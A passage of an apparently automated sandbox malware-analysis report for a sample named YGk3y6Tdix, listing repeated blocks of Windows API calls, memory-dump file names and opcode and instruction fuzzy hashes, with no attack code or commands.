                                                                                                                                                                                                • Part of subcall function 00FBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FBB58A
                                                                                                                                                                                                • Part of subcall function 00FBB568: IsDialogMessageW.USER32(00010416,?), ref: 00FBB59E
                                                                                                                                                                                                • Part of subcall function 00FBB568: TranslateMessage.USER32(?), ref: 00FBB5AC
                                                                                                                                                                                                • Part of subcall function 00FBB568: DispatchMessageW.USER32(?), ref: 00FBB5B6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 897784432-0
                                                                                                                                                                                              • Opcode ID: f8a59494baf2d601f1fdb7ab1e06200cc7bfeee754735d58b11aad5d69de0fc3
                                                                                                                                                                                              • Instruction ID: 0bb676302e1f6c5d93fe14928ebc4eeb5fb5512a8c0de50627b1ce93e91a20ba
                                                                                                                                                                                              • Opcode Fuzzy Hash: f8a59494baf2d601f1fdb7ab1e06200cc7bfeee754735d58b11aad5d69de0fc3
                                                                                                                                                                                              • Instruction Fuzzy Hash: BAD09E31144300BADA126B52DD06F4B7AA2BB88B04F004554B285740F18A769D21EF12
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetFileType.KERNELBASE(000000FF,00FA97BE), ref: 00FA98C8
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileType
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3081899298-0
                                                                                                                                                                                              • Opcode ID: b92889302911c65563298f10d587257e3a1b975d2f496cad8940dcf9bafb3cb3
                                                                                                                                                                                              • Instruction ID: ddfaac2ee8bf8f06b10c17dcce7c6266a4fcb790f472c570f3b61085281215ae
                                                                                                                                                                                              • Opcode Fuzzy Hash: b92889302911c65563298f10d587257e3a1b975d2f496cad8940dcf9bafb3cb3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 64C002B8808209968E219B3498490997722AE533BA7F496A5D169890A1C36ACC9BFA11
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 00f91f38add60be9d5a9567a8f264affd0536cdd45eb98fe1117386567873c4e
                                                                                                                                                                                              • Instruction ID: abfb76359155d2e103ee78661b063b9cb04c184043e25b7e52ba083a2adf8e2b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 00f91f38add60be9d5a9567a8f264affd0536cdd45eb98fe1117386567873c4e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DB012D2358501EC3005520B6D02EF7015ED1C5B10334C02FFC05C42C0D840EC043CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: e25bf4571ae229e726fb0df225f1d24eec23f24834efe1e4042c2a65a3749f9e
                                                                                                                                                                                              • Instruction ID: d709768229daddad6b9d917a20c89029289963a8105dec3a55f31d8a2a85e41b
                                                                                                                                                                                              • Opcode Fuzzy Hash: e25bf4571ae229e726fb0df225f1d24eec23f24834efe1e4042c2a65a3749f9e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 72B012D635C101AC3005514F6D03EF7015EE1C8B10334C02FF805C41C0D840EC003D72
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 10456a4b867156f17197ac9d1f620938b9c786121e574dea625bccebf28bc149
                                                                                                                                                                                              • Instruction ID: 9eb57ec65e6d3177980764242ee022636806f9ca08ed5b0218fbf3b22de0d855
                                                                                                                                                                                              • Opcode Fuzzy Hash: 10456a4b867156f17197ac9d1f620938b9c786121e574dea625bccebf28bc149
                                                                                                                                                                                              • Instruction Fuzzy Hash: 44B012D6358101BC3005114B6D03DF7011ED1C5B10334C42FFC41C44C0D840EC003CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 817b2b6a6e68cf8ef225512638fcadd6e7272aedb63e39f7e54e959f68ebcb5a
                                                                                                                                                                                              • Instruction ID: e24e8b667713ce4c286fa1ad2331f19f9ead861d4363defb68fd26a78a7432b8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 817b2b6a6e68cf8ef225512638fcadd6e7272aedb63e39f7e54e959f68ebcb5a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 54B012E2358001AC3005510B6E02EF701DED1C4B10734C02FF805C41C0DC41EC013C72
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 34d560535f3b7a17ba3ad30fc469f8d863bdb937d7578308e6b5b318a65b0e51
                                                                                                                                                                                              • Instruction ID: 15312dd0d6eeab4d48df05bdb1dedd70094f294d9c5d093d0c735cc67e3a8eaa
                                                                                                                                                                                              • Opcode Fuzzy Hash: 34d560535f3b7a17ba3ad30fc469f8d863bdb937d7578308e6b5b318a65b0e51
                                                                                                                                                                                              • Instruction Fuzzy Hash: 62B012D2358001AC3005511B6D02EFB019ED1C5B10334C02FFC05C41C0D840EC003CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 1df71d0e3cd3afbf7adb019086f6b966b7b59d8863c940ca84efbd423526e05c
                                                                                                                                                                                              • Instruction ID: 558e27b01f7e2e9f0457c25e2e5b94ef6843855320ec78da9f0725cf2d2b5c90
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1df71d0e3cd3afbf7adb019086f6b966b7b59d8863c940ca84efbd423526e05c
                                                                                                                                                                                              • Instruction Fuzzy Hash: EEB012D2369041AC3005510B6D02EF7019FE5C8B10734C02FF806C41C0D840EC003C72
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: fd8917e3a5f1fc95dd795e9c9f88a020c4ef63cebcc3438e12106c2f9f126048
                                                                                                                                                                                              • Instruction ID: a16a5041726aaf7706d3f3d8a584bef21820b5cebe9d95196999433a2ed2e3d8
                                                                                                                                                                                              • Opcode Fuzzy Hash: fd8917e3a5f1fc95dd795e9c9f88a020c4ef63cebcc3438e12106c2f9f126048
                                                                                                                                                                                              • Instruction Fuzzy Hash: F7B012E2359141BC3045520B6D02EF7015FD1C4B10734C12FF805C41C0D840EC443C72
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 76d5a690593636a6db82606d3069801075af43a1735bd608240184b1d0c789f3
                                                                                                                                                                                              • Instruction ID: 168ff0da7b66f44dfbaf882a375b587f5f232c286f8254a62257d5482022cf8f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 76d5a690593636a6db82606d3069801075af43a1735bd608240184b1d0c789f3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EB012D2359041AC3005510B6D02EF7015FD1C5B10734C02FFC05C41C0D840EC003CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 63f8b12ba0287c60bb816cdecf6875c70ffc2b51102a1a1787bd79298583d39c
                                                                                                                                                                                              • Instruction ID: b68306b7c2f058e1a1a527b1b28806f79e4cb31b7229a5d0841584684714eefd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 63f8b12ba0287c60bb816cdecf6875c70ffc2b51102a1a1787bd79298583d39c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9DB012E2358001AC3005510B6D02EF7015EE1C8F10334C02FF805C41C0D840EC003C72
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: e54cccf2298a9930eee4b01864338fed00c15f7af5b95be0c54b5b5dc01df831
                                                                                                                                                                                              • Instruction ID: 4c858246a2df036dffff6fbbdd7752913b637d63c68c5638d66ddbb4b55171c7
                                                                                                                                                                                              • Opcode Fuzzy Hash: e54cccf2298a9930eee4b01864338fed00c15f7af5b95be0c54b5b5dc01df831
                                                                                                                                                                                              • Instruction Fuzzy Hash: 54B012E2358001AC3005510B6E02FF7015ED1C4F10334C02FF805C41C0DC41ED013C72
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 1cc756924998aee0d91f3ba841f9d1b1d07bfbb951981f8f76776336d61038c1
                                                                                                                                                                                              • Instruction ID: 15a109d831ea8d8fc230e43a8228ea2f719d7e2a509108e6c1f41a292bcae09d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1cc756924998aee0d91f3ba841f9d1b1d07bfbb951981f8f76776336d61038c1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 61B012E2358101BC3045510B6D02EF7015ED1C4F10334C12FF805C41C0D841EC403C72
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
